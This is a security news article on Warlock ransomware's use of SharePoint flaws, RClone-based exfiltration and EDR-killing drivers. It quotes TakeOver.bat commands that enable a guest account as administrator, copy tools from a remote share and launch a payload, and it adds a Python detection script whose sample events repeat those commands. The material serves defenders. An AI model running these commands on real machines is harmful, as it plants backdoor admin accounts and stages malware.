
Warlock Ransomware Exploiting SharePoint Vulnerabilities to Gain Access and Steal Credentials

In recent weeks, the cybersecurity community has witnessed the rapid emergence of Warlock, a novel ransomware strain that weaponizes unpatched Microsoft SharePoint servers to infiltrate enterprise networks.

Initial analysis reveals that threat actors exploit publicly exposed SharePoint instances via specially crafted HTTP POST requests, deploying web shells that grant remote code execution within the target environment.

From this foothold, Warlock operators escalate privileges, harvest credentials, and move laterally using both built-in Windows utilities and custom malware components.

The payload ultimately encrypts critical data and exfiltrates sensitive files, demanding ransom under the “.x2anylock” extension.

Trend Micro analysts noted that Warlock first appeared on underground forums in June 2025, shortly after vulnerabilities in SharePoint authentication and deserialization mechanisms were disclosed.

Within days, the group claimed multiple high-profile victims across governmental, financial, and manufacturing sectors worldwide.

Researchers identified code patterns reminiscent of the leaked LockBit 3.0 builder, suggesting that Warlock may be a customized derivative rather than a wholly original creation.

This affiliation is further supported by similarities in negotiation tactics and ransom note formatting.

The impact of Warlock extends beyond encryption. During the final stage of an attack, operators employ the legitimate synchronization tool RClone—rebranded as TrendSecurity.exe—to siphon off credentials, documents, and database files to external cloud storage. This exfiltration phase uses a Proton Drive back end, leveraging burner credentials to obscure the destination.

In addition, the ransomware disables or terminates endpoint protection services by deploying a malicious driver (googleApiUtil64.sys) to kill security processes, including Trend Micro’s own netagent and VOneAgentConsoleTray.

Activating the ‘guest’ account (Source – Trend Micro)

Such actions highlight the sophistication of Warlock’s defense-evasion tactics. One aspect that exemplifies Warlock’s stealthy approach is its persistence mechanism.

After successfully uploading a web shell, attackers deploy a batch script named TakeOver.bat, which automates the creation of a backdoor account and the installation of scheduled tasks.

The script begins by activating the built-in “guest” account and adding it to the local Administrators group:

net user guest P@ssw0rd! /active:yes
net localgroup administrators guest /add

Next, it copies the malicious payload and ancillary tools from a remote share into C:\Users\Public\, using:

cmd[.]exe /c copy \\10.0.0.5\tools\* C:\Users\Public\ /y
start /B C:\Users\Public\payload.exe

Together with the scheduled tasks the script installs, this ensures that the payload survives system reboots and continues to run under minimal scrutiny.

Researchers identified that the script also creates a new Group Policy Object named “TakeOver” to reinstate the backdoor account if remediation attempts are made.

Execution of the batch file, eventually leading to ransomware deployment (Source – Trend Micro)

By combining web shell exploitation, group policy abuse, and driver-based process termination, Warlock achieves a resilient presence within compromised networks.

Its modular design and use of legitimate utilities further complicate detection and response efforts.

As organizations continue to patch SharePoint vulnerabilities, defenders must also monitor for anomalous GPO modifications, unusual service installations, and renamed binaries within public folders to detect and mitigate Warlock-infected environments.
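The following is an added detection example written for this article; it is not Trend Micro’s code and not part of the original report. It turns the TakeOver.bat behaviours described above (guest account activation, addition to local Administrators, copying from a remote share into C:\Users\Public, execution and scheduled tasks pointing into that folder) and the closing advice on renamed binaries into rules run over process-creation telemetry. The record shape (image path, command line, original PE filename) is an assumption modelled on Sysmon Event ID 1; the sample events are constructed from the commands quoted in the article plus constructed benign and renamed-binary records, and the `rclone.exe` original-filename value is likewise a constructed assumption.

```python
"""Detection rules for the TakeOver.bat behaviours described in the article.

Added example, not code from the article or from Trend Micro. Event records
are constructed; the field layout is an assumption modelled on Sysmon EID 1.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Normalised process-creation record (assumed shape, Sysmon-like)."""
    image: str                     # full path of the started binary
    command_line: str              # full command line as logged
    original_file_name: str = ""   # PE OriginalFileName, if the sensor records it


# Command-line patterns taken from the script lines quoted in the article.
NET_ACTIVATE = re.compile(
    r"\bnet1?(?:\.exe)?\s+user\s+(\S+)\s+.*?/active:yes", re.IGNORECASE)
NET_LOCALGROUP = re.compile(
    r"\bnet1?(?:\.exe)?\s+localgroup\s+administrators\s+(\S+)\s+/add", re.IGNORECASE)
UNC_COPY = re.compile(r"\bcopy\s+\\\\[\w.-]+\\", re.IGNORECASE)   # copy \\host\share...
SCHTASKS_CREATE = re.compile(r"\bschtasks(?:\.exe)?\s+/create\b", re.IGNORECASE)
PUBLIC_DIR = re.compile(r"c:\\users\\public\\", re.IGNORECASE)


def detect(ev: ProcEvent) -> list[str]:
    """Return a list of human-readable findings for one event (empty if benign)."""
    findings: list[str] = []
    cl = ev.command_line

    if m := NET_ACTIVATE.search(cl):
        findings.append(f"account activated via net user: {m.group(1)}")
    if m := NET_LOCALGROUP.search(cl):
        findings.append(f"account added to local Administrators: {m.group(1)}")
    if UNC_COPY.search(cl) and PUBLIC_DIR.search(cl):
        findings.append("copy from remote share into C:\\Users\\Public")
    if SCHTASKS_CREATE.search(cl) and PUBLIC_DIR.search(cl):
        findings.append("scheduled task created pointing into C:\\Users\\Public")
    if PUBLIC_DIR.search(ev.image):
        findings.append(f"process executing from C:\\Users\\Public: {ev.image}")

    # Renamed binary: on-disk name differs from the PE's embedded original filename.
    if ev.original_file_name:
        on_disk = ev.image.rsplit("\\", 1)[-1].lower()
        if on_disk != ev.original_file_name.lower():
            findings.append(
                f"renamed binary: {on_disk} has original filename {ev.original_file_name}")
    return findings


# Constructed sample telemetry: the article's script lines plus control records.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\net.exe",
              r"net user guest P@ssw0rd! /active:yes", "net.exe"),
    ProcEvent(r"C:\Windows\System32\net.exe",
              r"net localgroup administrators guest /add", "net.exe"),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c copy \\10.0.0.5\tools\* C:\Users\Public\ /y", "cmd.exe"),
    ProcEvent(r"C:\Users\Public\payload.exe",
              r"C:\Users\Public\payload.exe", "payload.exe"),
    # Constructed: RClone renamed as in the article; original filename is an assumption.
    ProcEvent(r"C:\Users\Public\TrendSecurity.exe",
              r"C:\Users\Public\TrendSecurity.exe sync C:\Finance remote:backup", "rclone.exe"),
    # Constructed benign control record.
    ProcEvent(r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs", "svchost.exe"),
    # Constructed scheduled-task persistence record.
    ProcEvent(r"C:\Windows\System32\schtasks.exe",
              r"schtasks /create /tn Updater /tr C:\Users\Public\payload.exe /sc onlogon",
              "schtasks.exe"),
]


def run_sample() -> list[list[str]]:
    """Apply detect() to every sample event and return findings per event."""
    return [detect(ev) for ev in SAMPLE_EVENTS]


if __name__ == "__main__":
    for ev, found in zip(SAMPLE_EVENTS, run_sample()):
        status = "ALERT" if found else "ok   "
        print(f"{status} {ev.image}")
        for f in found:
            print(f"       - {f}")
```

Each rule fires on a single event, so in practice the findings would be correlated per host over a short window: guest activation followed by an Administrators add and a copy into the Public folder from one machine is the sequence the article describes, and is far more specific than any rule alone. GPO changes such as the “TakeOver” object are not visible in process telemetry and need directory-service object auditing (Security Event ID 5136) on domain controllers instead.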

The post Warlock Ransomware Exploiting SharePoint Vulnerabilities to Gain Access and Steal Credentials appeared first on Cyber Security News.

Source: cybersecuritynews.com
